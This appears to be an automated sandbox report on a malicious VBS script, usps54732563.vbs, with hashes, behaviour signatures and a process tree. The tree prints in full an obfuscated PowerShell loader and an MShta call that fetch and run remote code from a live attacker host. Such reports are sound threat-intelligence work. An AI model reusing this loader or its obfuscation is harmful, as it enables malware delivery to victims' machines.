Analysis

  • max time kernel: 42s
  • max time network: 165s
  • platform: windows7_x64
  • resource: win7-20220718-en
  • resource tags: arch:x64 arch:x86 image:win7-20220718-en locale:en-us os:windows7-x64 system
  • submitted: 29-07-2022 18:19

General

  • Target: usps54732563.vbs
  • Size: 523B
  • MD5: f83e436ca7acf3f80ca706e118288f2b
  • SHA1: 2c760d46c138593186e359bef37a322dd3b73ece
  • SHA256: 442a2a8f6b9284cdec1fb7ff52faed051cba8337295e550389bbdd7bbc6c8c41
  • SHA512: 24a1ee24b6fb9387b70fa39ff22204a92dc25c1fbcd51f08fe50c776557ae5bd118bda68cc63e67a236aa3d98cb3add98d3189c4199bd227037e4ea8fdeb7f5a

Score
10/10

Malware Config

Extracted

  • Language: hta
  • Source: hta.dropper
  • URLs: https://clever-ishizaka.45-86-146-20.plesk.page/enc.txt

Signatures

  • Process spawned unexpected child process (2 IoCs)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request (5 IoCs)
  • Drops file in System32 directory (1 IoCs)
  • Modifies Internet Explorer settings (1 TTPs, 1 IoCs)
  • Modifies system certificate store (2 TTPs, 10 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\usps54732563.vbs"
      PID:1904
    • C:\Windows\system32\MShTa.exe
      MShTa https://clever-ishizaka.45-86-146-20.plesk.page/enc.txt
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      PID:1748
    • C:\Windows\System32\WindowsPowerShell\v1.0\pOwErshEll.exe
      pOwErshEll $HWRKDYPCHLPUKFTAYIHIWUY = '[2+795<^}+8#}}8/86]=%4@y2+795<^}+8#}}8/86]=%4@t[8^^89_^1/!/2!4%%@0]!0\@^5+[)3=53%<9\$%\!5%}.IO.2+795<^}+8#}}8/86]=%4@t\$532(_-&(2+}/{)-8668%[8^^89_^1/!/2!4%%@0]!0%[6)5=$@571*!2!572[8#=\@^5+[)3=53%<9\$%\!5%}\$532(_-&(2+}/{)-8668%[8^^89_^1/!/2!4%%@0]!0%[6)5=$@571*!2!572[8#=d[8^^89_^1/!/2!4%%@0]!0\$532(_-&(2+}/{)-8668%]'.Replace('2+795<^}+8#}}8/86]=%4@','S').Replace('[8^^89_^1/!/2!4%%@0]!0','E').Replace('\$532(_-&(2+}/{)-8668%','R').Replace('%[6)5=$@571*!2!572[8#=','A').Replace('\@^5+[)3=53%<9\$%\!5%}','M');$HGISFOJLGHGTWKXFKWLERCP = ($HWRKDYPCHLPUKFTAYIHIWUY -Join '')|&('I'+'EX');$HESVVOTYARWSCGTNFQORXXS = '[_9)=9(14!<2=/}412*-3^[y_9)=9(14!<2=/}412*-3^[#8!30%[-#@0}--_7!7^@3{^]328{(/\894+8^/*23(}3m.N^]328{(/\894+8^/*23(}3#8!30%[-#@0}--_7!7^@3{.W^]328{(/\894+8^/*23(}3bR^]328{(/\894+8^/*23(}3qu^]328{(/\894+8^/*23(}3_9)=9(14!<2=/}412*-3^[#8!30%[-#@0}--_7!7^@3{]'.Replace('_9)=9(14!<2=/}412*-3^[','S').Replace('^]328{(/\894+8^/*23(}3','E').Replace('#8!30%[-#@0}--_7!7^@3{','T');$HIGABGCKCBROYYQALTYPZKR = ($HESVVOTYARWSCGTNFQORXXS -Join '')|&('I'+'EX');$HOGUKKKLZNQHLPITPFOIIEG = '{#}-*=102}(})4{9449-_5r=0+]3!<!+2=61*%@^=$&$<a6[23_^7*6^5)+^2+__!+5*=0+]3!<!+2=61*%@^=$&$<'.Replace('{#}-*=102}(})4{9449-_5','C').Replace('=0+]3!<!+2=61*%@^=$&$<','E').Replace('6[23_^7*6^5)+^2+__!+5*','T');$HJPBNVFRVKQYTURDRPQKTRO = '3$48{=)*!4+-4[}<+^54[71@[/!}2-7-[){(<$+%/)61tR1@[/!}2-7-[){(<$+%/)61\\#7[_<}*1+[#=@[#}^*\/pon\\#7[_<}*1+[#=@[#}^*\/1@[/!}2-7-[){(<$+%/)61'.Replace('3$48{=)*!4+-4[}<+^54[7','G').Replace('1@[/!}2-7-[){(<$+%/)61','E').Replace('\\#7[_<}*1+[#=@[#}^*\/','S');$HDXFLYZFQJTQAWVJJGZFEHJ = 'G\\692[355)4<1]5(_+2][%t}$8$99[3-&=3*52=7/(13#\\692[355)4<1]5(_+2][%\^3819{_672<%/*4<#{@7}pon\^3819{_672<%/*4<#{@7}\\692[355)4<1]5(_+2][%\^3819{_672<%/*4<#{@7}t}$8$99[3-&=3*52=7/(13#\\692[355)4<1]5(_+2][%am'.Replace('\^3819{_672<%/*4<#{@7}','S').Replace('\\692[355)4<1]5(_+2][%','E').Replace('}$8$99[3-&=3*52=7/(13#','R');$HTYWQAKBUXVLTSROKPPULHW = 
']^\_<@-4!!<%4-1)({02](8/!<&\%39}##&-^(9%!)6#a4420=(@}=2&09<!1}})825To8/!<&\%39}##&-^(9%!)6#n4420=(@}=2&09<!1}})825'.Replace(']^\_<@-4!!<%4-1)({02](','R').Replace('8/!<&\%39}##&-^(9%!)6#','E').Replace('4420=(@}=2&09<!1}})825','D');&('I'+'EX')($HGISFOJLGHGTWKXFKWLERCP::new($HIGABGCKCBROYYQALTYPZKR::$HOGUKKKLZNQHLPITPFOIIEG('https://clever-ishizaka.45-86-146-20.plesk.page/bil1.txt').$HJPBNVFRVKQYTURDRPQKTRO().$HDXFLYZFQJTQAWVJJGZFEHJ()).$HTYWQAKBUXVLTSROKPPULHW())
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1012

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

      • Modify Registry (2) T1112
      • Install Root Certificate (1) T1130


    Downloads

    • memory/1012-56-0x000007FEF29B0000-0x000007FEF33D3000-memory.dmp
      Filesize: 10.1MB
    • memory/1012-57-0x000007FEF5F20000-0x000007FEF6A7D000-memory.dmp
      Filesize: 11.4MB
    • memory/1012-58-0x0000000001D64000-0x0000000001D67000-memory.dmp
      Filesize: 12KB
    • memory/1012-59-0x000000001B770000-0x000000001BA6F000-memory.dmp
      Filesize: 3.0MB
    • memory/1012-60-0x0000000001D64000-0x0000000001D67000-memory.dmp
      Filesize: 12KB
    • memory/1012-61-0x0000000001D6B000-0x0000000001D8A000-memory.dmp
      Filesize: 124KB
    • memory/1748-54-0x000007FEFC331000-0x000007FEFC333000-memory.dmp
      Filesize: 8KB